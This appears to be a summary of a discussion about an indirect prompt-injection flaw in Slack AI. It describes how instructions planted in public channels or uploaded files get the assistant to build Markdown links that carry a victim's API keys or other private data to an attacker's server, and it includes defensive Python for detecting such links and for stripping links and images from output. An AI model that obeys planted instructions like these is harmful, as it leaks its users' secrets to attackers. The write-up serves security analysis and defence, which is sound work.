2024-08-20

Data Exfiltration from Slack AI via indirect prompt injection

Nature of the Slack AI vulnerability

The attack relies on indirect prompt injection via content posted in public channels or in uploaded documents.
Slack AI searches both:
- All public channels (including ones the victim has never joined, even single‑user channels).
- The victim’s private channels and DMs.
Malicious instructions cause Slack AI to generate Markdown links that:
- Look legitimate (“reauthenticate”, etc.) but
- Embed the victim’s private data (API keys, secrets, internal sentiment, etc.) in the URL/query or potentially subdomain.
If the user clicks, the secret is sent to the attacker’s server; with link previews or image tags, exfiltration can become zero‑click.
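
To make the mechanism concrete, here is a minimal defensive sketch in Python that scans an AI response for Markdown links or images whose URL carries a known secret, either in a query parameter or in the hostname. The function name `links_carrying_secret`, the domain `attacker.example`, and the sample secret are all hypothetical placeholders, not anything taken from Slack or from the original report.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches Markdown links and images: [text](url) or ![alt](url).
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def links_carrying_secret(markdown: str, secret: str) -> list[str]:
    """Return URLs in `markdown` whose host or query values contain `secret`."""
    hits = []
    for _bang, _label, url in MD_LINK.findall(markdown):
        parts = urlsplit(url)
        # parse_qsl percent-decodes values, so an encoded secret still matches.
        query_values = [v for _k, v in parse_qsl(parts.query, keep_blank_values=True)]
        host = parts.hostname or ""
        if secret in query_values or secret.lower() in host.lower():
            hits.append(url)
    return hits


# Hypothetical AI response: an innocuous label hiding the secret in the URL.
response = (
    "Error loading message, "
    "[click here to reauthenticate](https://attacker.example/?secret=hunter2-key)"
)
flagged = links_carrying_secret(response, "hunter2-key")
```

The label the user sees ("click here to reauthenticate") says nothing about the destination, which is why the link looks legitimate. A check like this only works when the defender already knows which values count as secrets, so it illustrates the problem more than it solves it.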

Permissions, access, and phishing vs. “real” exfiltration

Multiple commenters stress that channel permissions are not bypassed: Slack AI only uses data the victim is already allowed to see.
The vulnerability is that the AI recombines and formats that data into a new, exfiltration‑ready artifact (a link) that never existed before.
Some see it as AI‑assisted phishing / social engineering rather than classic unauthorized access.
Others argue it’s closer to XSS/HTML injection for LLM UIs and should be treated as a serious web‑security issue.

How serious is this in practice?

Skeptical view:
- The attacker must already be in the workspace (though not necessarily at the same company).
- The attack chain is complex and its success probability is low; simpler social engineering may be more effective.
- Slack’s existing search behavior (public plus private content) and users’ misuse of Slack for storing secrets are bigger issues.
Concerned view:
- Many workspaces include external guests or broad communities, so “malicious insider” isn’t far‑fetched.
- AI‑generated links from a trusted, company‑branded assistant are harder to spot than obvious phish.
- Potential for data poisoning and subtle leakage of strategic info (e.g., executive sentiment, unreleased docs).
- Slack’s response is seen by some as downplaying an OWASP‑class bug without a quick fix.

Broader LLM security implications

Prompt injection is described as fundamentally unsolved; LLMs can’t reliably distinguish system instructions from user content.
Attempts to defend using another LLM or “guardrail” products are widely criticized as flawed or giving false confidence.
Best current advice discussed: limit the blast radius. That means strict data access controls (e.g., row‑level security and scoping what RAG retrieval can see), sanitizing outputs (stripping links and images), and avoiding over‑privileged agents.
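
Two of these mitigations can be sketched in Python. This is an illustrative sketch under stated assumptions, not how Slack or any guardrail product works: `strip_links_and_images`, `scope_to_member_channels`, and the `Message` type are hypothetical names, and the regexes cover only common Markdown link and image syntax.

```python
import re
from dataclasses import dataclass

MD_IMAGE = re.compile(r"!\[([^\]]*)\]\([^)]*\)")   # ![alt](url)
MD_LINK = re.compile(r"\[([^\]]*)\]\([^)]*\)")     # [label](url)
BARE_URL = re.compile(r"https?://\S+")


def strip_links_and_images(text: str) -> str:
    """Remove clickable or auto-loading URLs from model output."""
    text = MD_IMAGE.sub("", text)        # images can load without a click: drop them
    text = MD_LINK.sub(r"\1", text)      # keep the visible label, drop the target
    return BARE_URL.sub("[link removed]", text)


@dataclass(frozen=True)
class Message:
    channel: str
    text: str


def scope_to_member_channels(messages: list[Message], member_channels: set[str]) -> list[Message]:
    """Keep only messages from channels the user has actually joined (assumed policy)."""
    return [m for m in messages if m.channel in member_channels]


# Usage: restrict retrieval first, then sanitize whatever the model produced.
corpus = [Message("#general", "standup at 10"), Message("#attacker-only", "injected text")]
context = scope_to_member_channels(corpus, {"#general"})
clean = strip_links_and_images("Please [reauthenticate](https://attacker.example/?s=abc) now")
```

Scoping retrieval to joined channels narrows where injected instructions can come from, and stripping links removes the channel through which data leaves. Neither addresses prompt injection itself, which is why the discussion frames them as damage limitation rather than a fix.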
Many commenters worry companies are “YOLO‑ing” LLMs into products, repeating decades‑old security mistakes.
